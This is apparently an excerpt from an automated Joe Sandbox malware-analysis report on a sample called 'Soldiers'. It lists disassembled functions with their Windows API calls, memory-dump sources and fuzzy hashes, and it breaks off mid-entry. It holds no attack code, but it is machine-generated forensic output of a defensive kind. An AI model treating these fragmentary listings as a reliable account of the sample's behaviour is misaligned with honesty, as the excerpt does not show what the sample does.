                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                          • GetWindowLongW.USER32(?,000000F0,?,?,?,?,0095155C,00000000,?,00000000), ref: 0096B804
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,0095155C,00000000,?,00000000), ref: 0096B829
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,0095155C,00000000,?,00000000), ref: 0096B841
                                                          • GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,0095155C,00000000,?,00000000), ref: 0096B86A
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0095155C,00000000), ref: 0096B888
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: a8c1d15dd3031c8772fd47b7ea58fa120d213639d3f58ecda7a50e1e03e0303b
                                                          • Instruction ID: 2adf28831856530b79dbcfee34b3a417cfb3b4d6b4d81b6831da6eb9ca347761
                                                          • Opcode Fuzzy Hash: a8c1d15dd3031c8772fd47b7ea58fa120d213639d3f58ecda7a50e1e03e0303b
                                                          • Instruction Fuzzy Hash: 2E218372928255EFCB249F798C08B6A7BACFB45724F104B39F925D71E0E7309890DB90
                                                          Function 00939EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00939ED8
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002,00970980,?,00001004,00000000,00000000), ref: 00939F0A
                                                          • __itow.LIBCMT ref: 00939F22
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002,00970980,?,00001004,00000000,00000000), ref: 00939F4A
                                                          • __itow.LIBCMT ref: 00939F5B
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow$_memmove
                                                          • String ID:
                                                          • API String ID: 2983881199-0
                                                          • Opcode ID: f2280c0c0f2907f2b5997ced8547aff150c4da51b6cbccf8b9d59d3eb1e9f810
                                                          • Instruction ID: f38638468d2e2290c6fb3b19c0ce780eb964f1a4ed8dcff6fc11c60bf31c7c6b
                                                          • Opcode Fuzzy Hash: f2280c0c0f2907f2b5997ced8547aff150c4da51b6cbccf8b9d59d3eb1e9f810
                                                          • Instruction Fuzzy Hash: E321D731704208BFEF109AA48D8AFAE7BACEBC5B50F044025FA05D7281D6B1CD419FD2
                                                          Function 00956138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 00956159
                                                          • GetForegroundWindow.USER32 ref: 00956170
                                                          • GetDC.USER32(00000000), ref: 009561AC
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 009561B8
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 009561F3
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: be69eb10510896e88dcfd6ad7cf4cdac64559dc3b014f5e10771a8760baf1402
                                                          • Instruction ID: 09377de85e4e8e05836a0b53a165482224f4792db4f848a450f976b4dc181827
                                                          • Opcode Fuzzy Hash: be69eb10510896e88dcfd6ad7cf4cdac64559dc3b014f5e10771a8760baf1402
                                                          • Instruction Fuzzy Hash: 0A21A476A04604EFD704EF69DC84A6EB7F9EF88311F048469F84AD7252CA30AD44DB90
                                                          Function 008E16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008E1729
                                                          • SelectObject.GDI32(?,00000000), ref: 008E1738
                                                          • BeginPath.GDI32(?), ref: 008E174F
                                                          • SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 008E1778
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 657e969791ab46027c12439b6ab3a6b05bd891c3eaa8e5fe4ff6845a3ec85456
                                                          • Instruction ID: bfd5f1454438c17ed3df97f233733822c2419a2ea719740b9bb64c6df6e68a6f
                                                          • Opcode Fuzzy Hash: 657e969791ab46027c12439b6ab3a6b05bd891c3eaa8e5fe4ff6845a3ec85456
                                                          • Instruction Fuzzy Hash: EF21C13192C248EBDF10DFA9DC8D7A9BBA9FB02B25F144215F819D21B0D3749991EBC0
                                                          Function 0093C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 09f431bf8d2e05f412acee587cecf612a444b26f022119bdf059db8e7fae083f
                                                          • Instruction ID: a24e472196002a351fece4bc842e3ef51e759bdcd04e8837272d0b51207b9da9
                                                          • Opcode Fuzzy Hash: 09f431bf8d2e05f412acee587cecf612a444b26f022119bdf059db8e7fae083f
                                                          • Instruction Fuzzy Hash: 480196A36009057FD21465115C82FF7636D9EA0344F04C525FE0AB6642EB55EF5197E1
                                                          Function 0094504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00945075
                                                          • __beginthreadex.LIBCMT ref: 00945093
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 009450A8
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009450BE
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009450C5
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          • Opcode ID: 7f213fcf5fe0739751bd0badafb396f0bc903ca9ce86b637e69cfd6a29279583
                                                          • Instruction ID: 11823e68bccc6a4a5d61442cbf9d8385b3de2dc2c65369fc55aea5ae3367f8f4
                                                          • Opcode Fuzzy Hash: 7f213fcf5fe0739751bd0badafb396f0bc903ca9ce86b637e69cfd6a29279583
                                                          • Instruction Fuzzy Hash: C811087691C608BFC7019BE89C09F9BBBACAB85320F140255FC28D3391D6718D4497F0
                                                          Function 00938E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,00938900,?,?,?), ref: 00938E3C
                                                          • GetLastError.KERNEL32(?,00938900,?,?,?), ref: 00938E46
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00938900,?,?,?), ref: 00938E55
                                                          • HeapAlloc.KERNEL32(00000000,?,00938900,?,?,?), ref: 00938E5C
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,00938900,?,?,?), ref: 00938E73
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 78119321951f16acce6df6217b35577a8c65c94bd9f72654201bd96f7395d008
                                                          • Instruction ID: 48714918265727fdc539b5e0a420ebde2731cdf4749cd0674238d0ff07e71785
                                                          • Opcode Fuzzy Hash: 78119321951f16acce6df6217b35577a8c65c94bd9f72654201bd96f7395d008
                                                          • Instruction Fuzzy Hash: 550169B2214304FFDB205FA6EC88D6B7BADEFCA755B200529F849C2220DA719C51DA60
                                                          Function 009457FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0094581B
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00945829
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00945831
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0094583B
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00945877
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 0fb4b4f1f6fcf0a4e98bd4b2192956f9c78160958d1ebce7eb6b74faf70592c2
                                                          • Instruction ID: fca44b240c6ff7dc98091f1e67b74c10071ef11d6d35ac48824c8a23a5fda8a6
                                                          • Opcode Fuzzy Hash: 0fb4b4f1f6fcf0a4e98bd4b2192956f9c78160958d1ebce7eb6b74faf70592c2
                                                          • Instruction Fuzzy Hash: 24015732D19A1DEBCF00EFE4DC48AEDBBB8BB48711F424556E405B2251DF309590DBA1
                                                          Function 00937D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937C62,80070057,?,?,?,00938073), ref: 00937D45
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937C62,80070057,?,?), ref: 00937D60
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937C62,80070057,?,?), ref: 00937D6E
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937C62,80070057,?), ref: 00937D7E
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937C62,80070057,?,?), ref: 00937D8A
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 45ab2ff0e540945a1331eb4b07226482d94f9127c545792c0d98fdfadd1d491d
                                                          • Instruction ID: ed7f7ea1fa397bc12291537e529effb4f235edc5407e3284d48744e581317cc9
                                                          • Opcode Fuzzy Hash: 45ab2ff0e540945a1331eb4b07226482d94f9127c545792c0d98fdfadd1d491d
                                                          • Instruction Fuzzy Hash: E2017CB2619218FBDB214F94DC44BBABBAEEF84752F144024F908D7250D772ED40DBA0
                                                          Function 00938CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00938CDE
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00938CE8
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00938CF7
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00938CFE
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00938D14
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: f44903600c6b19a3793e95b2aa491e7d5f468fb3692f6887ba0565d6dad51129
                                                          • Instruction ID: 105647642f1a44c01b82845d38743354535489b4b424d74998ae202c332610d0
                                                          • Opcode Fuzzy Hash: f44903600c6b19a3793e95b2aa491e7d5f468fb3692f6887ba0565d6dad51129
                                                          • Instruction Fuzzy Hash: 13F04F36214304EFEF110FA59C89E673BADEF89754F504525F949C6190CA61DC81EB60
                                                          Function 00938D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00938D3F
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00938D49
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00938D58
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00938D5F
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00938D75
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 68df21f4a3c87d27eaa362c56745506644d93efbb65d9dd865fb57660a505d53
                                                          • Instruction ID: 1c56eb7bb393fff123f9e731307cf89d378b37347cf9c69b873f89783475d9cc
                                                          • Opcode Fuzzy Hash: 68df21f4a3c87d27eaa362c56745506644d93efbb65d9dd865fb57660a505d53
                                                          • Instruction Fuzzy Hash: E0F04F32254304EFEB110FA5EC88F673BADEF89754F540125F959C6190CB619D81EB60
                                                          Function 0093CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0093CD90
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0093CDA7
                                                          • MessageBeep.USER32(00000000), ref: 0093CDBF
                                                          • KillTimer.USER32(?,0000040A), ref: 0093CDDB
                                                          • EndDialog.USER32(?,00000001,?), ref: 0093CDF5
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 19c94183a034e2a3fe2435f2291523ef9f77f07a52b9a5962a64db96db29f687
                                                          • Instruction ID: cd8286fb3fc7824c2197c50e611c0dbdf85e44c3cb76a966b139a6950a3126ae
                                                          • Opcode Fuzzy Hash: 19c94183a034e2a3fe2435f2291523ef9f77f07a52b9a5962a64db96db29f687
                                                          • Instruction Fuzzy Hash: AC01D6B1514B08EBEB205B20DD5EFA67B7CFB40701F000669F596B10E1DBF4A9A49F80
                                                          Function 008E178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EndPath.GDI32(?,?,0091BBC9,00000000,?), ref: 008E179B
                                                          • StrokeAndFillPath.GDI32(?,?,0091BBC9,00000000,?), ref: 008E17B7
                                                          • SelectObject.GDI32(?,?,?,0091BBC9,00000000,?), ref: 008E17CA
                                                          • DeleteObject.GDI32(?,0091BBC9,00000000,?), ref: 008E17DD
                                                          • StrokePath.GDI32(?,?,0091BBC9,00000000,?), ref: 008E17F8
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: c74dd192104de01bdc32fea1c827cf9a7aaed8463d8bf6cd05f662ed78a39173
                                                          • Instruction ID: 2837f2daf094495e017f4d8b50f4aae14c13363f862954328ef154c77b558c10
                                                          • Opcode Fuzzy Hash: c74dd192104de01bdc32fea1c827cf9a7aaed8463d8bf6cd05f662ed78a39173
                                                          • Instruction Fuzzy Hash: 64F03C3102C248EBDB115F6AEC8DB697FA5FB42B26F048214F42D841F0D7384995EF90
                                                          Function 008EE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00900FE6: std::exception::exception.LIBCMT ref: 0090101C
                                                            • Part of subcall function 00900FE6: __CxxThrowException@8.LIBCMT ref: 00901031
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 008F1680: _memmove.LIBCMT ref: 008F16DB
                                                          • __swprintf.LIBCMT ref: 008EE598
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008EE431
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: f6f696516f14d3e202ea27be22a8d3481bc8f97c05988c2178dc47856a618fbe
                                                          • Instruction ID: 3b0f1bcea418c2c5865e78fd22885bf524f5040a38fcd336af4d2cfb9ce66d07
